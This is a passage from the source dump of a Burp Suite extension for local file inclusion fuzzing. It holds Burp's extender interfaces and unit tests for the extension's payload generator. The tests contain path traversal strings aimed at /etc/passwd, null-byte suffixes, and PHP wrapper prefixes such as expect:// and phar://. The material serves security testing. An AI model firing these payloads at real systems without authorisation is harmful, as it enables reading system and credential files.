44 | * Scan checks should submit raw non-encoded payloads to insertion points,
45 | * and the insertion point has responsibility for performing any data
46 | * encoding that is necessary given the nature and location of the insertion
47 | * point.
48 | *
49 | * @param baseRequestResponse The base HTTP request / response that should
50 | * be actively scanned.
51 | * @param insertionPoint An IScannerInsertionPoint object that
52 | * can be queried to obtain details of the insertion point being tested, and
53 | * can be used to build scan requests for particular payloads.
54 | * @return A list of IScanIssue objects, or null
55 | * if no issues are identified.
56 | */
57 | List doActiveScan(
58 | IHttpRequestResponse baseRequestResponse,
59 | IScannerInsertionPoint insertionPoint);
60 |
61 | /**
62 | * The Scanner invokes this method when the custom Scanner check has
63 | * reported multiple issues for the same URL path. This can arise either
64 | * because there are multiple distinct vulnerabilities, or because the same
65 | * (or a similar) request has been scanned more than once. The custom check
66 | * should determine whether the issues are duplicates. In most cases, where
67 | * a check uses distinct issue names or descriptions for distinct issues,
68 | * the consolidation process will simply be a matter of comparing these
69 | * features for the two issues.
70 | *
71 | * @param existingIssue An issue that was previously reported by this
72 | * Scanner check.
73 | * @param newIssue An issue at the same URL path that has been newly
74 | * reported by this Scanner check.
75 | * @return An indication of which issue(s) should be reported in the main
76 | * Scanner results. The method should return -1 to report the
77 | * existing issue only, 0 to report both issues, and
78 | * 1 to report the new issue only.
79 | */
80 | int consolidateDuplicateIssues(
81 | IScanIssue existingIssue,
82 | IScanIssue newIssue);
83 | }
84 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerInsertionPoint.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScannerInsertionPoint.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to define an insertion point for use by active Scanner
14 | * checks. Extensions can obtain instances of this interface by registering an
15 | * IScannerCheck, or can create instances for use by Burp's own
16 | * scan checks by registering an
17 | * IScannerInsertionPointProvider.
18 | */
19 | public interface IScannerInsertionPoint
20 | {
21 |
22 | /**
23 | * Used to indicate where the payload is inserted into the value of a URL
24 | * parameter.
25 | */
26 | static final byte INS_PARAM_URL = 0x00;
27 | /**
28 | * Used to indicate where the payload is inserted into the value of a body
29 | * parameter.
30 | */
31 | static final byte INS_PARAM_BODY = 0x01;
32 | /**
33 | * Used to indicate where the payload is inserted into the value of an HTTP
34 | * cookie.
35 | */
36 | static final byte INS_PARAM_COOKIE = 0x02;
37 | /**
38 | * Used to indicate where the payload is inserted into the value of an item
39 | * of data within an XML data structure.
40 | */
41 | static final byte INS_PARAM_XML = 0x03;
42 | /**
43 | * Used to indicate where the payload is inserted into the value of a tag
44 | * attribute within an XML structure.
45 | */
46 | static final byte INS_PARAM_XML_ATTR = 0x04;
47 | /**
48 | * Used to indicate where the payload is inserted into the value of a
49 | * parameter attribute within a multi-part message body (such as the name of
50 | * an uploaded file).
51 | */
52 | static final byte INS_PARAM_MULTIPART_ATTR = 0x05;
53 | /**
54 | * Used to indicate where the payload is inserted into the value of an item
55 | * of data within a JSON structure.
56 | */
57 | static final byte INS_PARAM_JSON = 0x06;
58 | /**
59 | * Used to indicate where the payload is inserted into the value of an AMF
60 | * parameter.
61 | */
62 | static final byte INS_PARAM_AMF = 0x07;
63 | /**
64 | * Used to indicate where the payload is inserted into the value of an HTTP
65 | * request header.
66 | */
67 | static final byte INS_HEADER = 0x20;
68 | /**
69 | * Used to indicate where the payload is inserted into a URL path folder.
70 | */
71 | static final byte INS_URL_PATH_FOLDER = 0x21;
72 | /**
73 | * Used to indicate where the payload is inserted into a URL path folder.
74 | * This is now deprecated; use INS_URL_PATH_FOLDER instead.
75 | */
76 | @Deprecated
77 | static final byte INS_URL_PATH_REST = INS_URL_PATH_FOLDER;
78 | /**
79 | * Used to indicate where the payload is inserted into the name of an added
80 | * URL parameter.
81 | */
82 | static final byte INS_PARAM_NAME_URL = 0x22;
83 | /**
84 | * Used to indicate where the payload is inserted into the name of an added
85 | * body parameter.
86 | */
87 | static final byte INS_PARAM_NAME_BODY = 0x23;
88 | /**
89 | * Used to indicate where the payload is inserted into the body of the HTTP
90 | * request.
91 | */
92 | static final byte INS_ENTIRE_BODY = 0x24;
93 | /**
94 | * Used to indicate where the payload is inserted into the URL path
95 | * filename.
96 | */
97 | static final byte INS_URL_PATH_FILENAME = 0x25;
98 | /**
99 | * Used to indicate where the payload is inserted at a location manually
100 | * configured by the user.
101 | */
102 | static final byte INS_USER_PROVIDED = 0x40;
103 | /**
104 | * Used to indicate where the insertion point is provided by an
105 | * extension-registered
106 | * IScannerInsertionPointProvider.
107 | */
108 | static final byte INS_EXTENSION_PROVIDED = 0x41;
109 | /**
110 | * Used to indicate where the payload is inserted at an unknown location
111 | * within the request.
112 | */
113 | static final byte INS_UNKNOWN = 0x7f;
114 |
115 | /**
116 | * This method returns the name of the insertion point.
117 | *
118 | * @return The name of the insertion point (for example, a description of a
119 | * particular request parameter).
120 | */
121 | String getInsertionPointName();
122 |
123 | /**
124 | * This method returns the base value for this insertion point.
125 | *
126 | * @return the base value that appears in this insertion point in the base
127 | * request being scanned, or null if there is no value in the
128 | * base request that corresponds to this insertion point.
129 | */
130 | String getBaseValue();
131 |
132 | /**
133 | * This method is used to build a request with the specified payload placed
134 | * into the insertion point. There is no requirement for extension-provided
135 | * insertion points to adjust the Content-Length header in requests if the
136 | * body length has changed, although Burp-provided insertion points will
137 | * always do this and will return a request with a valid Content-Length
138 | * header.
139 | * Note:
140 | * Scan checks should submit raw non-encoded payloads to insertion points,
141 | * and the insertion point has responsibility for performing any data
142 | * encoding that is necessary given the nature and location of the insertion
143 | * point.
144 | *
145 | * @param payload The payload that should be placed into the insertion
146 | * point.
147 | * @return The resulting request.
148 | */
149 | byte[] buildRequest(byte[] payload);
150 |
151 | /**
152 | * This method is used to determine the offsets of the payload value within
153 | * the request, when it is placed into the insertion point. Scan checks may
154 | * invoke this method when reporting issues, so as to highlight the relevant
155 | * part of the request within the UI.
156 | *
157 | * @param payload The payload that should be placed into the insertion
158 | * point.
159 | * @return An int[2] array containing the start and end offsets of the
160 | * payload within the request, or null if this is not applicable (for
161 | * example, where the insertion point places a payload into a serialized
162 | * data structure, the raw payload may not literally appear anywhere within
163 | * the resulting request).
164 | */
165 | int[] getPayloadOffsets(byte[] payload);
166 |
167 | /**
168 | * This method returns the type of the insertion point.
169 | *
170 | * @return The type of the insertion point. Available types are defined in
171 | * this interface.
172 | */
173 | byte getInsertionPointType();
174 | }
175 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerInsertionPointProvider.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScannerInsertionPointProvider.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * Extensions can implement this interface and then call
16 | * IBurpExtenderCallbacks.registerScannerInsertionPointProvider()
17 | * to register a factory for custom Scanner insertion points.
18 | */
19 | public interface IScannerInsertionPointProvider
20 | {
21 | /**
22 | * When a request is actively scanned, the Scanner will invoke this method,
23 | * and the provider should provide a list of custom insertion points that
24 | * will be used in the scan. Note: these insertion points are used in
25 | * addition to those that are derived from Burp Scanner's configuration, and
26 | * those provided by any other Burp extensions.
27 | *
28 | * @param baseRequestResponse The base request that will be actively
29 | * scanned.
30 | * @return A list of
31 | * IScannerInsertionPoint objects that should be used in the
32 | * scanning, or
33 | * null if no custom insertion points are applicable for this
34 | * request.
35 | */
36 | List getInsertionPoints(
37 | IHttpRequestResponse baseRequestResponse);
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScannerListener.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScannerListener.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerScannerListener() to register a
15 | * Scanner listener. The listener will be notified of new issues that are
16 | * reported by the Scanner tool. Extensions can perform custom analysis or
17 | * logging of Scanner issues by registering a Scanner listener.
18 | */
19 | public interface IScannerListener
20 | {
21 | /**
22 | * This method is invoked when a new issue is added to Burp Scanner's
23 | * results.
24 | *
25 | * @param issue An
26 | * IScanIssue object that the extension can query to obtain
27 | * details about the new issue.
28 | */
29 | void newScanIssue(IScanIssue issue);
30 | }
31 |
--------------------------------------------------------------------------------
/src/main/java/burp/IScopeChangeListener.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IScopeChangeListener.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerScopeChangeListener() to register
15 | * a scope change listener. The listener will be notified whenever a change
16 | * occurs to Burp's suite-wide target scope.
17 | */
18 | public interface IScopeChangeListener
19 | {
20 | /**
21 | * This method is invoked whenever a change occurs to Burp's suite-wide
22 | * target scope.
23 | */
24 | void scopeChanged();
25 | }
26 |
--------------------------------------------------------------------------------
/src/main/java/burp/ISessionHandlingAction.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)ISessionHandlingAction.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * Extensions can implement this interface and then call
14 | * IBurpExtenderCallbacks.registerSessionHandlingAction() to
15 | * register a custom session handling action. Each registered action will be
16 | * available within the session handling rule UI for the user to select as a
17 | * rule action. Users can choose to invoke an action directly in its own right,
18 | * or following execution of a macro.
19 | */
20 | public interface ISessionHandlingAction
21 | {
22 | /**
23 | * This method is used by Burp to obtain the name of the session handling
24 | * action. This will be displayed as an option within the session handling
25 | * rule editor when the user selects to execute an extension-provided
26 | * action.
27 | *
28 | * @return The name of the action.
29 | */
30 | String getActionName();
31 |
32 | /**
33 | * This method is invoked when the session handling action should be
34 | * executed. This may happen as an action in its own right, or as a
35 | * sub-action following execution of a macro.
36 | *
37 | * @param currentRequest The base request that is currently being processed.
38 | * The action can query this object to obtain details about the base
39 | * request. It can issue additional requests of its own if necessary, and
40 | * can use the setter methods on this object to update the base request.
41 | * @param macroItems If the action is invoked following execution of a
42 | * macro, this parameter contains the result of executing the macro.
43 | * Otherwise, it is
44 | * null. Actions can use the details of the macro items to
45 | * perform custom analysis of the macro to derive values of non-standard
46 | * session handling tokens, etc.
47 | */
48 | void performAction(
49 | IHttpRequestResponse currentRequest,
50 | IHttpRequestResponse[] macroItems);
51 | }
52 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITab.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)ITab.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.awt.Component;
13 |
14 | /**
15 | * This interface is used to provide Burp with details of a custom tab that will
16 | * be added to Burp's UI, using a method such as
17 | * IBurpExtenderCallbacks.addSuiteTab().
18 | */
19 | public interface ITab
20 | {
21 | /**
22 | * Burp uses this method to obtain the caption that should appear on the
23 | * custom tab when it is displayed.
24 | *
25 | * @return The caption that should appear on the custom tab when it is
26 | * displayed.
27 | */
28 | String getTabCaption();
29 |
30 | /**
31 | * Burp uses this method to obtain the component that should be used as the
32 | * contents of the custom tab when it is displayed.
33 | *
34 | * @return The component that should be used as the contents of the custom
35 | * tab when it is displayed.
36 | */
37 | Component getUiComponent();
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITempFile.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)ITempFile.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * This interface is used to hold details of a temporary file that has been
14 | * created via a call to
15 | * IBurpExtenderCallbacks.saveToTempFile().
16 | *
17 | */
18 | public interface ITempFile
19 | {
20 | /**
21 | * This method is used to retrieve the contents of the buffer that was saved
22 | * in the temporary file.
23 | *
24 | * @return The contents of the buffer that was saved in the temporary file.
25 | */
26 | byte[] getBuffer();
27 |
28 | /**
29 | * This method is deprecated and no longer performs any action.
30 | */
31 | @Deprecated
32 | void delete();
33 | }
34 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITextEditor.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)ITextEditor.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.awt.Component;
13 |
14 | /**
15 | * This interface is used to provide extensions with an instance of Burp's raw
16 | * text editor, for the extension to use in its own UI. Extensions should call
17 | * IBurpExtenderCallbacks.createTextEditor() to obtain an instance
18 | * of this interface.
19 | */
20 | public interface ITextEditor
21 | {
22 | /**
23 | * This method returns the UI component of the editor, for extensions to add
24 | * to their own UI.
25 | *
26 | * @return The UI component of the editor.
27 | */
28 | Component getComponent();
29 |
30 | /**
31 | * This method is used to control whether the editor is currently editable.
32 | * This status can be toggled on and off as required.
33 | *
34 | * @param editable Indicates whether the editor should be currently
35 | * editable.
36 | */
37 | void setEditable(boolean editable);
38 |
39 | /**
40 | * This method is used to update the currently displayed text in the editor.
41 | *
42 | * @param text The text to be displayed.
43 | */
44 | void setText(byte[] text);
45 |
46 | /**
47 | * This method is used to retrieve the currently displayed text.
48 | *
49 | * @return The currently displayed text.
50 | */
51 | byte[] getText();
52 |
53 | /**
54 | * This method is used to determine whether the user has modified the
55 | * contents of the editor.
56 | *
57 | * @return An indication of whether the user has modified the contents of
58 | * the editor since the last call to
59 | * setText().
60 | */
61 | boolean isTextModified();
62 |
63 | /**
64 | * This method is used to obtain the currently selected text.
65 | *
66 | * @return The currently selected text, or
67 | * null if the user has not made any selection.
68 | */
69 | byte[] getSelectedText();
70 |
71 | /**
72 | * This method can be used to retrieve the bounds of the user's selection
73 | * into the displayed text, if applicable.
74 | *
75 | * @return An int[2] array containing the start and end offsets of the
76 | * user's selection within the displayed text. If the user has not made any
77 | * selection in the current message, both offsets indicate the position of
78 | * the caret within the editor.
79 | */
80 | int[] getSelectionBounds();
81 |
82 | /**
83 | * This method is used to update the search expression that is shown in the
84 | * search bar below the editor. The editor will automatically highlight any
85 | * regions of the displayed text that match the search expression.
86 | *
87 | * @param expression The search expression.
88 | */
89 | void setSearchExpression(String expression);
90 | }
91 |
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/PayloadGeneratorConfigTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import org.junit.jupiter.api.BeforeEach;
4 | import org.junit.jupiter.api.Test;
5 |
6 | import static org.junit.jupiter.api.Assertions.*;
7 |
8 | class PayloadGeneratorConfigTest {
9 |
10 | private PayloadGeneratorConfig config;
11 |
12 | @BeforeEach
13 | void setup(){
14 | config = new PayloadGeneratorConfig();
15 | }
16 |
17 | @Test
18 | void testPayloadCardinalityNegSlashSettings() {
19 | config.slashMax = -1;
20 | config.slashMin = -2;
21 |
22 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
23 | assertEquals("Invalid Configurations", exception.getMessage());
24 | }
25 |
26 | @Test
27 | void testPayloadCardinalityNegTranSettings() {
28 | config.tranMax = -1;
29 | config.tranMin = -2;
30 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
31 | assertEquals("Invalid Configurations", exception.getMessage());
32 | }
33 |
34 | @Test
35 | void testPayloadCardinalityNegDotSlashSettings() {
36 | config.dotsMax = -1;
37 | config.dotsMin = -2;
38 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
39 | assertEquals("Invalid Configurations", exception.getMessage());
40 | }
41 |
42 | @Test
43 | void testPayloadCardinalityNegSlashSettingsMaxMin() {
44 | config.slashMax = 1;
45 | config.slashMin = 2;
46 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
47 | assertEquals("Invalid Configurations", exception.getMessage());
48 | }
49 |
50 | @Test
51 | void testPayloadCardinalityNegTranSettingsMaxMin() {
52 | config.tranMax = 1;
53 | config.tranMin = 2;
54 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
55 | assertEquals("Invalid Configurations", exception.getMessage());
56 | }
57 |
58 | @Test
59 | void testPayloadCardinalityDotSettingsMaxMin() {
60 | config = new PayloadGeneratorConfig();
61 | config.dotsMax = -1;
62 | config.dotsMin = -2;
63 | Throwable exception = assertThrows(PayloadConfigException.class, config::getPayloadCardinality);
64 | assertEquals("Invalid Configurations", exception.getMessage());
65 | }
66 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/TreeStructureTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import org.junit.jupiter.api.Test;
4 |
5 | import java.util.Set;
6 |
7 | import static org.junit.jupiter.api.Assertions.*;
8 |
9 | class TreeStructureTest {
10 |
11 | @Test
12 | void testTreeComparator() {
13 | Set testTree = TreeStructure.getTree();
14 | testTree.add("testing".getBytes());
15 | testTree.add("testing".getBytes());
16 | assertEquals(testTree.size(), 1, "Binary tree comparator does not handle bytes");
17 | }
18 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/payloadTypes/ExtraCharsPayloadsTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import org.junit.jupiter.api.BeforeEach;
5 | import org.junit.jupiter.api.Test;
6 |
7 | import java.nio.charset.StandardCharsets;
8 | import java.util.Set;
9 |
10 | import static LfiFuzzer.TreeStructure.getTree;
11 | import static org.junit.jupiter.api.Assertions.*;
12 |
13 | class ExtraCharsPayloadsTest {
14 |
15 | private Set previousPayloads;
16 | private PayloadGeneratorConfig config;
17 | private String failInfo;
18 |
19 | @BeforeEach
20 | void setup(){
21 | previousPayloads = getTree();
22 | config = new PayloadGeneratorConfig();
23 | config.nullByteYes = true;
24 | }
25 |
26 | @Test
27 | void generatePayloadEmptySetTest() {
28 | failInfo = "empty payload set should not increase in size";
29 | ExtraCharsPayloads tester = new ExtraCharsPayloads(previousPayloads, config, "slash");
30 | assertTrue(tester.generatePayload().isEmpty(), failInfo);
31 | }
32 |
33 | @Test
34 | void generatePayloadForwardSlashesTest() {
35 | failInfo = "forward slashes should be duplicated";
36 | addPreviousPayload("/etc/passwd");
37 | ExtraCharsPayloads tester = new ExtraCharsPayloads(previousPayloads, config, "slash");
38 | config.slashMin = 1;
39 | config.slashMax = 3;
40 | config.forwardSlash = true;
41 | config.backwardsSlash = false;
42 | assertTrue(tester.generatePayload().contains(decodeString("///etc///passwd")), failInfo);
43 | }
44 |
45 | @Test
46 | void generatePayloadDots() {
47 | failInfo = "Dots should be duplicated";
48 | addPreviousPayload("../../etc/passwd");
49 | ExtraCharsPayloads tester = new ExtraCharsPayloads(previousPayloads, config, "dots");
50 | config.dotsMin = 1;
51 | config.dotsMax = 3;
52 | for(byte[] example : tester.generatePayload()) System.out.println(new String(example));
53 | assertTrue(tester.generatePayload().contains(decodeString("....../....../etc/passwd")), failInfo);
54 | }
55 |
56 | void addPreviousPayload(String p){
57 | previousPayloads.add(decodeString(p));
58 | }
59 |
60 | byte[] decodeString(String p){
61 | return p.getBytes(StandardCharsets.US_ASCII);
62 | }
63 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/payloadTypes/NullBytePayloadsTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import org.junit.jupiter.api.BeforeEach;
5 | import org.junit.jupiter.api.Test;
6 |
7 | import java.nio.charset.StandardCharsets;
8 | import java.util.Set;
9 |
10 | import static LfiFuzzer.TreeStructure.getTree;
11 | import static org.junit.jupiter.api.Assertions.*;
12 |
13 | class NullBytePayloadsTest {
14 |
15 | private Set previousPayloads;
16 | private PayloadGeneratorConfig config;
17 | private String failInfo;
18 |
19 | @BeforeEach
20 | void setup(){
21 | previousPayloads = getTree();
22 | config = new PayloadGeneratorConfig();
23 | config.nullByteYes = true;
24 | }
25 |
26 | @Test
27 | void generatePayloadNullBytes() {
28 | failInfo = "null byte should be created on empty set";
29 |
30 | NullBytePayloads tester = new NullBytePayloads(previousPayloads, config);
31 | assertTrue(tester.generatePayload().contains(decodeString("%00")), failInfo);
32 | }
33 |
34 | @Test
35 | void generatePayloadNullBytesOnFile() {
36 | failInfo = "null byte should the prefix to the file";
37 | addPreviousPayload("/etc/passwd");
38 |
39 | NullBytePayloads tester = new NullBytePayloads(previousPayloads, config);
40 | assertTrue(tester.generatePayload().contains(decodeString("/etc/passwd%00")), failInfo);
41 | }
42 |
43 | @Test
44 | void doNotGeneratePayloadNullBytes() {
45 | failInfo = "null byte should not be created when nullBytesYes is false";
46 | addPreviousPayload("/etc/passwd");
47 | config.nullByteYes = false;
48 |
49 | NullBytePayloads tester = new NullBytePayloads(previousPayloads, config);
50 | assertEquals(0, tester.generatePayload().size(), failInfo);
51 | }
52 |
53 | void addPreviousPayload(String p){
54 | previousPayloads.add(decodeString(p));
55 | }
56 |
57 | byte[] decodeString(String p){
58 | return p.getBytes(StandardCharsets.US_ASCII);
59 | }
60 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/payloadTypes/PayloadFactoryTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import org.junit.jupiter.api.BeforeEach;
5 | import org.junit.jupiter.api.Test;
6 |
7 | import java.util.Set;
8 |
9 | import static LfiFuzzer.TreeStructure.getTree;
10 | import static org.junit.jupiter.api.Assertions.assertEquals;
11 | import static org.junit.jupiter.api.Assertions.assertThrows;
12 |
13 | class PayloadFactoryTest {
14 |
15 | private Set payloads;
16 | private PayloadGeneratorConfig config;
17 |
18 | @BeforeEach
19 | void setup(){
20 | payloads = getTree();
21 | config = new PayloadGeneratorConfig();
22 | }
23 |
24 | @Test
25 | void getInvalidPayloadTypeTest(){
26 | String failInfo = "failed to raise correct exception with invalid payload generator type";
27 | Throwable exception = assertThrows(PayloadNotFoundException.class, () -> {
28 | PayloadFactory.getPayloadType("fake", payloads, config);
29 | });
30 | assertEquals("Failed to find payload type: fake", exception.getMessage(), failInfo);
31 | }
32 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/payloadTypes/TransversalPayloadsTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import org.junit.jupiter.api.BeforeEach;
5 | import org.junit.jupiter.api.Test;
6 |
7 | import java.nio.charset.StandardCharsets;
8 | import java.util.Set;
9 |
10 | import static LfiFuzzer.TreeStructure.getTree;
11 | import static org.junit.jupiter.api.Assertions.*;
12 |
13 | class TransversalPayloadsTest {
14 |
15 | private Set previousPayloads;
16 | private PayloadGeneratorConfig config;
17 | private String failInfo;
18 |
19 | @BeforeEach
20 | void setup(){
21 | previousPayloads = getTree();
22 | config = new PayloadGeneratorConfig();
23 | }
24 |
25 | @Test
26 | void generatePayloadEmptyTest() {
27 | failInfo = "No additional payloads should be generated when the original set is of size 0";
28 | TransversalPayloads tester = new TransversalPayloads(previousPayloads, config);
29 | assertEquals(0, tester.generatePayload().size(), failInfo);
30 | }
31 |
32 | @Test
33 | void generatePayloadForwardTest() {
34 | failInfo = "forward directory transversal failed";
35 | addPreviousPayload("/etc/passwd");
36 | byte[] expected = decodeString("../etc/passwd");
37 | config.forwardSlash = true;
38 | config.slashMin = 1;
39 | config.backwardsSlash = false;
40 |
41 | TransversalPayloads tester = new TransversalPayloads(previousPayloads, config);
42 |
43 | assertTrue(tester.generatePayload().contains(expected), failInfo);
44 | }
45 |
46 | @Test
47 | void generatePayloadForwardMissingSlashTest(){
48 | failInfo = "forward directory transversal failed on partial file path";
49 | addPreviousPayload("etc/passwd");
50 | byte[] expected = decodeString("../etc/passwd");
51 | config.forwardSlash = true;
52 | config.backwardsSlash = false;
53 |
54 | TransversalPayloads tester = new TransversalPayloads(previousPayloads, config);
55 | assertTrue(tester.generatePayload().contains(expected), failInfo);
56 | }
57 |
58 | @Test
59 | void generatePayloadBackwardsTest(){
60 | failInfo = "backwards directory transversal failed on file path";
61 | addPreviousPayload("\\etc\\passwd");
62 | byte[] expected = decodeString("..\\etc\\passwd");
63 | config.forwardSlash = true;
64 | config.backwardsSlash = false;
65 |
66 | TransversalPayloads tester = new TransversalPayloads(previousPayloads, config);
67 | assertTrue(tester.generatePayload().contains(expected), failInfo);
68 | }
69 |
70 | @Test
71 | void generatePayloadBackwardsMissingSlashTest(){
72 | failInfo = "backwards directory transversal failed on partial file path";
73 | addPreviousPayload("etc\\passwd");
74 | byte[] expected = decodeString("..\\etc\\passwd");
75 | config.forwardSlash = false;
76 | config.backwardsSlash = true;
77 |
78 | TransversalPayloads tester = new TransversalPayloads(previousPayloads, config);
79 | assertTrue(tester.generatePayload().contains(expected), failInfo);
80 | }
81 |
82 | void addPreviousPayload(String p){
83 | previousPayloads.add(decodeString(p));
84 | }
85 |
86 | byte[] decodeString(String p){
87 | return p.getBytes(StandardCharsets.US_ASCII);
88 | }
89 | }
--------------------------------------------------------------------------------
/src/test/java/LfiFuzzer/payloadTypes/WrapperPayloadsTest.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import org.junit.jupiter.api.BeforeEach;
5 | import org.junit.jupiter.api.Test;
6 |
7 | import java.nio.charset.StandardCharsets;
8 | import java.util.Set;
9 |
10 | import static LfiFuzzer.TreeStructure.getTree;
11 | import static org.junit.jupiter.api.Assertions.*;
12 |
13 | class WrapperPayloadsTest {
14 |
15 | private Set previousPayloads;
16 | private PayloadGeneratorConfig config;
17 | private String failInfo;
18 |
19 | @BeforeEach
20 | void setup(){
21 | previousPayloads = getTree();
22 | config = new PayloadGeneratorConfig();
23 | config.nullByteYes = true;
24 | }
25 |
26 | @Test
27 | void generatePayloadWithExpectTest() {
28 | failInfo = "failed to generate payloads with expect wrapper";
29 | addPreviousPayload("examplePayload");
30 | byte[] expected = decodeString("expect://examplePayload");
31 | config.expectWrapper = true;
32 |
33 | WrapperPayloads tester = new WrapperPayloads(previousPayloads, config);
34 | assertTrue(tester.generatePayload().contains(expected), failInfo);
35 | }
36 |
37 | @Test
38 | void generatePayloadWithFilterTest() {
39 | failInfo = "failed to generate payloads with expect wrapper";
40 | addPreviousPayload("examplePayload");
41 | byte[] expected = decodeString("filter://examplePayload");
42 | config.filterWrapper = true;
43 |
44 | WrapperPayloads tester = new WrapperPayloads(previousPayloads, config);
45 | assertTrue(tester.generatePayload().contains(expected), failInfo);
46 | }
47 |
48 | @Test
49 | void generatePayloadWithPharTest() {
50 | failInfo = "failed to generate payloads with phar wrapper";
51 | addPreviousPayload("examplePayload");
52 | byte[] expected = decodeString("phar://examplePayload");
53 | config.pharWrapper = true;
54 |
55 | WrapperPayloads tester = new WrapperPayloads(previousPayloads, config);
56 | assertTrue(tester.generatePayload().contains(expected), failInfo);
57 | }
58 |
59 | @Test
60 | void generatePayloadWithZipTest() {
61 | failInfo = "failed to generate payloads with zip wrapper";
62 | addPreviousPayload("examplePayload");
63 | byte[] expected = decodeString("zip://examplePayload");
64 | config.zipWrapper = true;
65 |
66 | WrapperPayloads tester = new WrapperPayloads(previousPayloads, config);
67 | assertTrue(tester.generatePayload().contains(expected), failInfo);
68 | }
69 |
70 | void addPreviousPayload(String p){
71 | previousPayloads.add(decodeString(p));
72 | }
73 |
74 | byte[] decodeString(String p){
75 | return p.getBytes(StandardCharsets.US_ASCII);
76 | }
77 | }
--------------------------------------------------------------------------------
/target/.gitignore:
--------------------------------------------------------------------------------
1 | archive-tmp/
2 | classes/
3 | generated-sources/
4 | LfiBurp-1.0.jar/
5 | LfiBurp-1.0-jar-with-dependencies.jar
6 | maven-archiver/
7 | maven-status/
--------------------------------------------------------------------------------
/target/LfiBurp-1.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke-goddard/LFI-Fuzzer-Burp-Suite/f64b65287abf5718303a6eb17935f87c13231c9f/target/LfiBurp-1.0.jar
--------------------------------------------------------------------------------
/target/classes/LfiFuzzer/PayloadConfigException.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke-goddard/LFI-Fuzzer-Burp-Suite/f64b65287abf5718303a6eb17935f87c13231c9f/target/classes/LfiFuzzer/PayloadConfigException.class
--------------------------------------------------------------------------------
/target/classes/LfiFuzzer/PayloadGenerator.class:
--------------------------------------------------------------------------------
